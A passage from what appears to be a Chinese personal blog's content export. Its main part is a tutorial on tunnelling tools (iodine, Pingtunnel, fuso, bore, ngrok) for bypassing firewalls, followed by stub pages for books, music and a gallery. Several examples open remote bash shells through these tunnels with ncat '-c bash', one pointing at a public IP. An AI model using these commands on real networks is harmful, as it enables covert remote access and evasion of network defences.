class="property">transport</span>]</span><br><span class="line">type = <span class="string">&quot;noise&quot;</span></span><br><span class="line">[server.<span class="property">transport</span>.<span class="property">noise</span>]</span><br><span class="line">pattern = <span class="string">&quot;Noise_KK_25519_ChaChaPoly_BLAKE2s&quot;</span></span><br><span class="line">local_private_key = <span class="string">&quot;server-priv-key-here&quot;</span></span><br><span class="line">remote_public_key = <span class="string">&quot;client-pub-key-here&quot;</span></span><br><span class="line"></span><br><span class="line"># <span class="title class_">Client</span> <span class="title class_">Side</span> <span class="title class_">Configuration</span></span><br><span class="line">[client.<span class="property">transport</span>]</span><br><span class="line">type = <span class="string">&quot;noise&quot;</span></span><br><span class="line">[client.<span class="property">transport</span>.<span class="property">noise</span>]</span><br><span class="line">pattern = <span class="string">&quot;Noise_KK_25519_ChaChaPoly_BLAKE2s&quot;</span></span><br><span class="line">local_private_key = <span class="string">&quot;client-priv-key-here&quot;</span></span><br><span class="line">remote_public_key = <span class="string">&quot;server-pub-key-here&quot;</span></span><br></pre></td></tr></table></figure>

<hr>
<h2 id="iodine"><a href="#iodine" class="headerlink" title="iodine"></a>iodine</h2><aside>
📖  dns 隧道建立，可以通过dns服务器隧道ipv4数据，可用于绕过网络防火墙

</aside>

<blockquote>
<p>功能</p>
</blockquote>
<ul>
<li>建立 DNS 隧道</li>
<li>绕过网络防火墙封锁</li>
</ul>
<blockquote>
<p>安装</p>
</blockquote>
<ul>
<li>项目地址：<a href="https://github.com/yarrick/iodine">https://github.com/yarrick/iodine</a></li>
</ul>
<blockquote>
<p>使用</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">环境：公网服务器，域名</span><br><span class="line">设置域名解析，添加A记录指向公网服务器</span><br><span class="line">添加<span class="variable constant_">NS</span>记录指向A记录</span><br><span class="line"></span><br><span class="line">服务端：sudo iodined -f -c -P passwd <span class="number">192.168</span><span class="number">.11</span><span class="number">.1</span> ns1.<span class="property">domain</span>.<span class="property">com</span> -<span class="variable constant_">DD</span>   </span><br><span class="line">-f 前台运行</span><br><span class="line">-c 在每个请求时禁用检查客户端<span class="variable constant_">IP</span>/端口</span><br><span class="line">-P 指定密码</span><br><span class="line">-D 指定调试级别，<span class="variable constant_">DD</span>,<span class="variable constant_">DDD</span>。</span><br><span class="line"></span><br><span class="line">客户端：sudo iodine -f -r  -P passwd ns1.<span class="property">domain</span>.<span class="property">com</span></span><br><span class="line">-f 前台运行</span><br><span class="line">-r 强制dns隧道</span><br><span class="line">-P 指定密码</span><br><span class="line"></span><br><span class="line">执行后会使用虚拟网卡tun/tap建立dns隧道。</span><br></pre></td></tr></table></figure>

<blockquote>
<p>参数详解</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">**iodined 服务端：**</span><br><span class="line">-v打印版本信息并退出</span><br><span class="line"></span><br><span class="line">-h打印帮助并退出</span><br><span class="line"></span><br><span class="line">-<span class="number">4</span>只监听<span class="title class_">IPv4</span></span><br><span class="line"></span><br><span class="line">-<span class="number">6</span>只监听<span class="title class_">IPv6</span></span><br><span class="line"></span><br><span class="line">-c在每个请求时禁用检查客户端<span class="variable constant_">IP</span>/端口</span><br><span class="line"></span><br><span class="line">-s跳过创建和配置tun设备;然后必须手动创建</span><br><span class="line"></span><br><span class="line">-f保持在前台运行</span><br><span class="line"></span><br><span class="line">-D增加调试级别  (在<span class="variable constant_">UTF</span>-<span class="number">8</span>终端使用-<span class="attr">DD</span>: <span class="string">&quot;LC_ALL=C luit碘化-DD…&quot;</span>)</span><br><span class="line"></span><br><span class="line">-u name删除权限并以用户name运行</span><br><span class="line"></span><br><span class="line">-t dir to chroot to dir目录</span><br><span class="line"></span><br><span class="line">-d device设置隧道设备名称</span><br><span class="line"></span><br><span class="line">-m mtu设置隧道设备的mtu</span><br><span class="line"></span><br><span class="line">-z context用于初始化后应用<span class="title class_">SELinux</span>上下文</span><br><span class="line"></span><br><span class="line">-l监听传入dns流量的<span class="title class_">IPv4</span>地址(默认<span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>) (使用“外部”只监听外部<span class="variable constant_">IP</span>，通过服务查找)</span><br><span class="line"></span><br><span class="line">-L用于侦听传入dns流量的<span class="title class_">IPv6</span>地址(默认::)</span><br><span class="line"></span><br><span class="line">-p监听传入<span class="variable constant_">DNS</span>流量的端口(默认为<span class="number">53</span>)</span><br><span class="line"></span><br><span class="line">-n ip以响应<span class="variable constant_">NS</span>查询 (使用“auto”使用外部<span class="variable constant_">IP</span>，通过服务查找)</span><br><span class="line"></span><br><span class="line">-b端口转发正常的<span class="variable constant_">DNS</span>查询(在本地主机上)</span><br><span class="line"></span><br><span class="line">-P用于身份验证的-P密码(最多使用<span class="number">32</span>个字符)</span><br><span class="line"></span><br><span class="line">-F pidfile将pid写入文件</span><br><span class="line"></span><br><span class="line">-i关闭前的最大空闲时间</span><br><span class="line"></span><br><span class="line">**iodine 客户端：**</span><br><span class="line">-<span class="number">4</span>只连接<span class="title class_">IPv4</span></span><br><span class="line"></span><br><span class="line">-<span class="number">6</span>只连接<span class="title class_">IPv6</span></span><br><span class="line"></span><br><span class="line">-T force dns <span class="attr">type</span>: <span class="variable constant_">NULL</span>, <span class="variable constant_">PRIVATE</span>, <span class="variable constant_">TXT</span>, <span class="variable constant_">SRV</span>, <span class="variable constant_">MX</span>, <span class="variable constant_">CNAME</span>, <span class="title function_">A</span>(默认值:autodetect)</span><br><span class="line"></span><br><span class="line">-O 强制下游编码-T除<span class="attr">NULL</span>: <span class="title class_">Base32</span>, <span class="title class_">Base64</span>, <span class="title class_">Base64</span>u，<span class="title class_">Base128</span>，或(仅限<span class="attr">TXT</span>:) <span class="title class_">Raw</span>(默认值:autodetect)</span><br><span class="line"></span><br><span class="line">-I 最大请求间隔(默认<span class="number">4</span>秒)，以防止<span class="variable constant_">DNS</span>超时</span><br><span class="line"></span><br><span class="line">-L <span class="number">1</span>:使用延迟模式低延迟(默认)。<span class="number">0</span>:不(暗示- <span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">-m 下行分片的最大大小(默认为autodetect)</span><br><span class="line"></span><br><span class="line">-M 上游主机名的最大大小(~<span class="number">100</span>-<span class="number">255</span>，默认值:<span class="number">255</span>)</span><br><span class="line"></span><br><span class="line">-r 跳过原始<span class="variable constant_">UDP</span>模式的尝试</span><br><span class="line"></span><br><span class="line">-P 用于身份验证的-P密码(最多使用<span class="number">32</span>个字符)</span><br><span class="line"></span><br><span class="line">其他选项:</span><br><span class="line"></span><br><span class="line">-v打印版本信息并退出</span><br><span class="line"></span><br><span class="line">-h打印帮助并退出</span><br><span class="line"></span><br><span class="line">-f保持在前台运行</span><br><span class="line"></span><br><span class="line">-u name删除权限并以用户name运行</span><br><span class="line"></span><br><span class="line">-t dir to chroot to dir目录</span><br><span class="line"></span><br><span class="line">-d device设置隧道设备名称</span><br><span class="line"></span><br><span class="line">-z context，用于初始化后应用指定的<span class="title class_">SELinux</span>上下文</span><br><span class="line"></span><br><span class="line">-F pidfile将pid写入文件</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Pingtunnel"><a href="#Pingtunnel" class="headerlink" title="Pingtunnel"></a>Pingtunnel</h2><aside>
📢 Ping隧道是一种通过ICMP发送TCP/UDP流量的工具。
通过伪造ping，把tcp/udp/sock5流量通过远程服务器转发到目的服务器上。用于突破某些运营商封锁TCP/UDP流量。

<p>项目地址：<a href="https://github.com/esrrhs/pingtunnel">https://github.com/esrrhs/pingtunnel</a></p>
</aside>

<blockquote>
<p>功能</p>
</blockquote>
<ul>
<li>建立 ping （icmp）隧道</li>
<li>绕过防火墙网络限制</li>
</ul>
<blockquote>
<p>安装</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">安装:<span class="attr">https</span>:<span class="comment">//github.com/esrrhs/pingtunnel</span></span><br><span class="line">或者使用包管理器：apt,pacman,brew</span><br></pre></td></tr></table></figure>

<blockquote>
<p>使用</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">建立 socks5隧道</span><br><span class="line">服务器端</span><br><span class="line">sudo pingtunnel -type server  -key <span class="number">123456</span> -nolog <span class="number">1</span> -noprint <span class="number">1</span></span><br><span class="line"></span><br><span class="line">客户端</span><br><span class="line">建立 socks5 隧道，会在客户端监听<span class="number">8090</span>为socks5隧道与服务器端通信，使用icmp协议</span><br><span class="line">sudo pingtunnel -type client -l :<span class="number">8090</span> -s 服务器端ip  -key <span class="number">123456</span> -sock5 <span class="number">1</span>  -nolog <span class="number">1</span> -noprint <span class="number">1</span></span><br><span class="line"></span><br><span class="line">建立 http 隧道</span><br><span class="line">服务器端</span><br><span class="line">sudo pingtunnel -type server  -key <span class="number">123456</span> -nolog <span class="number">1</span> -noprint <span class="number">1</span></span><br><span class="line">并且在服务器端监听一个 http 隧道 使用文章中提到的 glider</span><br><span class="line">glider -listen <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>：<span class="number">8090</span> </span><br><span class="line"></span><br><span class="line">客户端</span><br><span class="line">客户端与服务端连接，并且将本地的<span class="number">8090</span>端口的流量发送到服务器端的 <span class="number">8090</span>端口，服务器端<span class="number">8090</span>为http隧道。使用icmp协议建立隧道</span><br><span class="line">sudo pingtunnel -type client -l :<span class="number">8090</span> -s 服务器端ip -t <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">8090</span>  -key <span class="number">123456</span> -tcp <span class="number">1</span>  -nolog <span class="number">1</span> -noprint <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="variable constant_">UDP</span> 转发</span><br><span class="line">sudo pingtunnel -type client -l :<span class="number">8090</span> -s 服务器端ip -t 服务器端<span class="attr">ip</span>:<span class="number">4455</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<ul>
<li>上线 shell</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">服务器端</span><br><span class="line">sudo pingtunnel -type server  -key <span class="number">123456</span> -nolog <span class="number">1</span> -noprint <span class="number">1</span></span><br><span class="line">ncat -vnlp <span class="number">8090</span> -k </span><br><span class="line">服务器端使用pingtunnel 建立icmp服务端，随后使用ncat 监听一个端口，等待客户端ncat连接。</span><br><span class="line"></span><br><span class="line">客户端</span><br><span class="line">sudo pingtunnel -type client -l :<span class="number">8090</span> -s <span class="number">139.180</span><span class="number">.189</span><span class="number">.48</span> -t <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">8090</span>  -key <span class="number">123456</span> -tcp <span class="number">1</span>  -nolog <span class="number">1</span> -noprint <span class="number">1</span></span><br><span class="line">ncat -vn <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span>  -c bash  </span><br><span class="line">客户端连接上服务器端的icmp隧道，使用ncat连接<span class="number">8090.</span>开启bash。服务器端ncat会受到请求。可直接执行命令。</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="fuso"><a href="#fuso" class="headerlink" title="fuso"></a>fuso</h2><aside>
📢 一款体积小, 快速, 稳定, 高效, 轻量的内网穿透, 端口转发工具 支持多连接,级联代理,传输加密。

<p>项目地址：<a href="https://github.com/editso/fuso">https://github.com/editso/fuso</a></p>
</aside>

<blockquote>
<p>功能</p>
</blockquote>
<ul>
<li>端口转发</li>
<li>socks5 代理</li>
<li>加密压缩传输</li>
<li>级联代理</li>
<li>kcp 支持</li>
</ul>
<blockquote>
<p>安装</p>
</blockquote>
<ul>
<li><a href="https://github.com/editso/fuso/releases">https://github.com/editso/fuso/releases</a></li>
<li>下载对应系统架构版本的包。</li>
<li>服务端使用fus，客户端使用fuc。</li>
</ul>
<blockquote>
<p>使用</p>
</blockquote>
<ul>
<li>端口转发</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">**服务端**</span><br><span class="line">服务端监听 <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>（所有ip,默认），监听<span class="number">6767</span>端口，开启socks,开启udp转发。</span><br><span class="line">sudo ./fus -l <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>  -p <span class="number">6767</span> --enable-socks <span class="literal">true</span> --enable-ufd <span class="literal">true</span></span><br><span class="line"></span><br><span class="line">**客户端**</span><br><span class="line">客户端指定连接ip（服务器ip），指定服务器端口，指定转发的本地ip地址<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> ，和本地端口<span class="number">8090</span>,指定映射在服务器端的端口为<span class="number">8090</span></span><br><span class="line">sudo ./fuc <span class="number">139.180</span><span class="number">.189</span><span class="number">.48</span> <span class="number">6767</span> --forward-host <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>  --forward-port <span class="number">8090</span> --visit-bind-port <span class="number">8090</span></span><br><span class="line"></span><br><span class="line">随后在服务器端，访问服务器本地的<span class="number">8090</span>就相当于访问客户端的转发端口，<span class="number">8090</span>。可以设置转发绑定在本地端口的任何服务。如ssh，隧道等等。</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">**利用映射端口配合 ncat 反弹shell**</span><br><span class="line"></span><br><span class="line">客户端执行 ncat -vnlp <span class="number">8090</span> -c bash</span><br><span class="line">服务端执行 ncat -vn <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span></span><br></pre></td></tr></table></figure>

<ul>
<li>官方 socks5 隧道支持</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">服务端</span><br><span class="line">sudo ./fus -l <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>  -p <span class="number">6767</span> --enable-socks <span class="literal">true</span> --enable-ufd <span class="literal">true</span></span><br><span class="line"></span><br><span class="line">客户端</span><br><span class="line">开启socks 开启socks udp ，设置账号，密码。</span><br><span class="line">sudo ./fuc <span class="number">139.180</span><span class="number">.189</span><span class="number">.48</span> <span class="number">6767</span> --forward-host <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>  --socks --socks-udp --socks-username admin --socks-password passwd  --visit-bind-port <span class="number">8090</span></span><br><span class="line"></span><br><span class="line">服务器端配置 socks5 隧道就可以使用客户端网络连接。</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Bore"><a href="#Bore" class="headerlink" title="Bore"></a>Bore</h2><aside>
📢 Rust 中的一个现代、简单的TCP隧道，将本地端口暴露给远程服务器，绕过标准的NAT连接防火墙。
官方维护了公共服务器，可不自建服务器进行测试。

<p>项目地址：<a href="https://github.com/ekzhang/bore">https://github.com/ekzhang/bore</a></p>
</aside>

<blockquote>
<p>安装</p>
</blockquote>
<ul>
<li><code>cargo install bore-cli</code></li>
<li><a href="https://github.com/ekzhang/bore/releases">https://github.com/ekzhang/bore/releases</a></li>
<li>或使用包管理器：apt ，pacman ，brew 等等。</li>
</ul>
<blockquote>
<p>功能</p>
</blockquote>
<ul>
<li>内网穿透</li>
<li>端口转发</li>
<li>流量隧道</li>
</ul>
<blockquote>
<p>使用</p>
</blockquote>
<ul>
<li>端口转发</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">服务端</span><br><span class="line">bore server  -s passwd</span><br><span class="line">执行后开启服务，设置密码，服务会监听到<span class="number">7835</span>端口</span><br><span class="line"></span><br><span class="line">客户端</span><br><span class="line">bore local -l <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span> -t 服务器ip -p <span class="number">8090</span>  -s passwd</span><br><span class="line">执行后将本地<span class="number">8090</span>端口转发到服务器的<span class="number">8090</span> 端口。</span><br><span class="line"></span><br><span class="line">可以转发所有服务，例如 ssh,socks5隧道，http隧道等等。</span><br></pre></td></tr></table></figure>

<ul>
<li>流量隧道</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">http / socks5 隧道</span><br><span class="line">客户端使用文章中提到glider 监听隧道</span><br><span class="line">glider -listen :<span class="number">8090</span> -verbose </span><br><span class="line">bore local -l <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span> -t 服务器ip -p <span class="number">8090</span>  -s passwd</span><br><span class="line"></span><br><span class="line">服务端配置后可实现连接内网客户端隧道。</span><br><span class="line">bore server  -s passwd</span><br><span class="line">随后配置<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span> 为socks5 或者 http 隧道。</span><br></pre></td></tr></table></figure>

<ul>
<li>远程 shell</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">客户端</span><br><span class="line">ncat -vnlp <span class="number">8090</span> -c bash</span><br><span class="line">bore local -l <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span> -t 服务器ip -p <span class="number">8090</span>  -s passwd</span><br><span class="line"></span><br><span class="line">服务端</span><br><span class="line">ncat -vn <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span></span><br><span class="line">bore server  -s passwd</span><br><span class="line"></span><br><span class="line">通过ncat 建立shell。通过 bore 进行流量隧道转发。</span><br></pre></td></tr></table></figure>

<blockquote>
<p><a href="http://bore.pub/">bore.pub</a></p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">官方托管了一个公共服务器 bore.<span class="property">pub</span> ，可以直接指定为服务器进行连接。</span><br><span class="line"></span><br><span class="line">例如：</span><br><span class="line">将本地<span class="number">8090</span>,转发到 bore.<span class="property">pub</span> 的<span class="number">8090</span></span><br><span class="line">bore local -l <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span> -t bore.<span class="property">pub</span> -p <span class="number">8090</span></span><br><span class="line"></span><br><span class="line">不指定端口号的话会随机在bore.<span class="property">pub</span>上连接一个端口。</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Ngrok"><a href="#Ngrok" class="headerlink" title="Ngrok"></a>Ngrok</h2><aside>
📌 NGROK 是一种全球分布式反向代理，可保护和加速应用程序和网络服务，无论在何处运行它们。可以将 ngrok 视为应用程序的前门。NGROK 是一个统一的入口平台，因为它将所有组件组合在一起，将流量从服务传递到 Internet 中。ngrok 将反向代理、负载均衡器、API 网关、防火墙、交付网络、DDoS 防护等整合在一起。

<p>🗯️ 无需自建服务器，直接连接官方服务器。</p>
<p>官网：<a href="https://ngrok.com/">https://ngrok.com/</a><br>官方文档：<a href="https://ngrok.com/docs/">https://ngrok.com/docs/</a></p>
</aside>

<blockquote>
<p>功能</p>
</blockquote>
<ul>
<li>反向代理</li>
<li>内网穿透</li>
<li>端口转发</li>
<li>流量隧道</li>
</ul>
<blockquote>
<p>安装</p>
</blockquote>
<ul>
<li><code>brew install ngrok/ngrok/ngrok</code></li>
<li><code>yay -S aur/ngrok</code></li>
<li><code>choco install ngrok</code></li>
<li><code>apt install ngrok</code></li>
</ul>
<blockquote>
<p>基本使用</p>
</blockquote>
<ul>
<li>登陆官网</li>
<li>注册账户</li>
<li><code>ngrok config add-authtoken &lt;TOKEN&gt;</code>  指定token连接</li>
<li><code>ngrok http http://localhost:8080</code> 启动，将本地8080 端口转发到ngrok 官方服务器。执行后会显示随机分配的域名地址。</li>
<li><code>ngrok http http://localhost:8080 --oauth=google --oauth-allow-email=alan@example.com</code>  添加google 认证，防止任何人都能访问。</li>
<li><code>ngrok http [http://localhost:8080](http://localhost:8080/) --basic-auth &#39;username:passwd12345678&#39;</code>  添加账户密码基本身份认证，：分割账号密码。</li>
<li><code>ngrok http [file:///var/log](file:///var/log)</code>  开启一个http文件服务，类似与 <code>pythom -m http.server</code></li>
<li><code>ngrok tcp 22</code>   使用 tcp 协议转发22端口，ssh服务。或者使用3389等公开rdp，公开vnc等等。</li>
</ul>
<hr>
<h1 id="Over-。-。-。☺️"><a href="#Over-。-。-。☺️" class="headerlink" title="Over 。 。 。☺️"></a>Over 。 。 。☺️</h1><h1 id="Over-。-。-。☺️-1"><a href="#Over-。-。-。☺️-1" class="headerlink" title="Over 。 。 。☺️"></a>Over 。 。 。☺️</h1><h1 id="Over-。-。-。☺️-2"><a href="#Over-。-。-。☺️-2" class="headerlink" title="Over 。 。 。☺️"></a>Over 。 。 。☺️</h1><h1 id="Over-。-。-。☺️-3"><a href="#Over-。-。-。☺️-3" class="headerlink" title="Over 。 。 。☺️"></a>Over 。 。 。☺️</h1><h1 id="Over-。-。-。☺️-4"><a href="#Over-。-。-。☺️-4" class="headerlink" title="Over 。 。 。☺️"></a>Over 。 。 。☺️</h1></div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>技巧</category>
        <category>流量隧道</category>
      </categories>
      <tags>
        <tag>流量隧道</tag>
      </tags>
  </entry>
  <entry>
    <title>关于作者</title>
    <url>/about/index.html</url>
    <content><![CDATA[<div class="note blue icon-padding modern"><i class="note-icon fa-brands fa-redhat"></i><p>个人简介</p>
</div>
<div class="note blue modern"><p>昵称：方糖<br>年龄：18<br>性别：男</p>
</div>
<div class="note blue modern"><p>座右铭：怎么开心怎么来<br>人生观：怎么开心怎么来<br>学习观：怎么开心怎么来<br>价值观：怎么开心怎么来</p>
</div>


]]></content>
  </entry>
  <entry>
    <title>  </title>
    <url>/archlinux/index.html</url>
    <content><![CDATA[<div class="note blue icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>arch linux 一个很棒的linux发行版</p>
</div>



]]></content>
  </entry>
  <entry>
    <title>书籍</title>
    <url>/books/index.html</url>
    <content><![CDATA[<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-book"></i><p>唐诗三百首</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-book"></i><p>唐诗三百首</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-book"></i><p>唐诗三百首</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-book"></i><p>唐诗三百首</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-book"></i><p>唐诗三百首</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-book"></i><p>唐诗三百首</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-book"></i><p>唐诗三百首</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-book"></i><p>唐诗三百首</p>
</div>

]]></content>
  </entry>
  <entry>
    <title>分类</title>
    <url>/categories/index.html</url>
    <content><![CDATA[]]></content>
  </entry>
  <entry>
    <title>图库</title>
    <url>/images/index.html</url>
    <content><![CDATA[<div class="gallery-group-main">

  <figure class="gallery-group">
  <img class="gallery-group-img no-lightbox" src='https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7f362750-a16a-4c0b-a648-1b7257dcc079%2F67b0bdc2af904ca28958c94f53748868.jpg?table=block&id=b966da21-7382-48eb-9709-1650445508c2&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2' alt="Group Image Gallery">
  <figcaption>
  <div class="gallery-group-name">壁纸</div>
  <p>喜欢的图片</p>
  <a href='/images/tupian/'></a>
  </figcaption>
  </figure>
  

  <figure class="gallery-group">
  <img class="gallery-group-img no-lightbox" src='https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F0ba35ba7-0595-4df3-9554-8a173658bf56%2Ff00560e3b4aa41318e39d77bb2776829.jpg?table=block&id=d818de25-29ec-49da-a19d-3ec6a392271f&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2' alt="Group Image Gallery">
  <figcaption>
  <div class="gallery-group-name">理想</div>
  <p>喜欢的图片</p>
  <a href='/images/tupian/'></a>
  </figcaption>
  </figure>
  

  <figure class="gallery-group">
  <img class="gallery-group-img no-lightbox" src='https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F26f31f31-2616-4247-851a-17f1b29f33b2%2F55da18c34cf24b1bafcf37d3fddcf4ab.jpg?table=block&id=f02a8834-d79e-419f-9579-4d996ed0293a&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2' alt="Group Image Gallery">
  <figcaption>
  <div class="gallery-group-name">远方</div>
  <p>喜欢的图片</p>
  <a href='/images/tupian/'></a>
  </figcaption>
  </figure>
  

  <figure class="gallery-group">
  <img class="gallery-group-img no-lightbox" src='https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F4803d1a3-6ecb-4e3d-bb2c-624a650841c9%2F4fb78b1c69554d5da2d9d4cd326cb399.jpg?table=block&id=c43a70e3-f397-4c2a-b178-8bed53d102d3&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2' alt="Group Image Gallery">
  <figcaption>
  <div class="gallery-group-name">爱情</div>
  <p>喜欢的图片</p>
  <a href='/images/tupian/'></a>
  </figcaption>
  </figure>
  
</div>


]]></content>
  </entry>
  <entry>
    <title>友情链接</title>
    <url>/link/index.html</url>
    <content><![CDATA[]]></content>
  </entry>
  <entry>
    <title>音乐</title>
    <url>/music/index.html</url>
    <content><![CDATA[<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-music"></i><p>恋恋风尘-程壁</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-music"></i><p>长街万象-程响</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-music"></i><p>之子于归-霍尊</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-music"></i><p>时间停下-房东的猫</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-music"></i><p>云烟成雨-房东的猫</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-music"></i><p>一个故事-张杰</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fa-solid fa-music"></i><p>斑马斑马-房东的猫</p>
</div>


]]></content>
  </entry>
  <entry>
    <title>标签</title>
    <url>/tags/index.html</url>
    <content><![CDATA[]]></content>
  </entry>
  <entry>
    <title>图库</title>
    <url>/images/tupian/index.html</url>
    <content><![CDATA[<div class="gallery">
    <div class="fj-gallery  data" data-rowHeight="220" data-limit="10">
    <span class="gallery-data">[{"url":"https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ff8b2ed6b-2cc0-4a65-8787-161dc55c4135%2Fb9f3d1013cae48c4964936b93122edcd.jpg?table=block&id=fc273fa3-be81-4aa2-97cf-32b54248c8f0&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2","alt":""},{"url":"https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1e79506c-d409-4def-92b2-0186b03ee142%2Fc586cac74b474b5ea5458a046e8b14c0.jpg?table=block&id=60596e13-9bda-4f2e-9163-fd559732db4e&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2","alt":""},{"url":"https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fce96e855-d6e1-4f81-9515-4e2fd217c6f9%2F5c23d52f880511ebb6edd017c2d2eca2.jpg?table=block&id=44156f35-c8a9-498c-932d-acfec82fae40&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2","alt":""},{"url":"https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F4803d1a3-6ecb-4e3d-bb2c-624a650841c9%2F4fb78b1c69554d5da2d9d4cd326cb399.jpg?table=block&id=c43a70e3-f397-4c2a-b178-8bed53d102d3&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2","alt":""},{"url":"https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F638ee6e8-6554-4f9b-80b7-9e9c0636d58b%2F68b69f4ebfae47d4b6ea479d71ff4328.jpg?table=block&id=e8f018ad-07dc-4cc2-8f66-7a0e6a4abc41&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2","alt":""},{"url":"https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F3aa9fa6a-3baa-4beb-aacc-2af52a888c9c%2F61ac5e440dac4d97a6624e05044c4074.jpg?table=block&id=8fc6b60d-9507-4039-b7c0-64aec1ea34b8&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2","alt":""},{"url":"https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Feb10ebbf-5bd7-4132-8a17-80b464d97765%2F96b26df8437c44e899f67d2fee4777ae.jpg?table=block&id=e1d2fe81-6fc0-4e15-a680-161ba2b57f03&spaceId=c83b5e26-6112-4af3-b822-de3746064a99&width=2000&userId=&cache=v2","alt":""},{"url":"https://cookie-crest-0c5.notion.site/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-st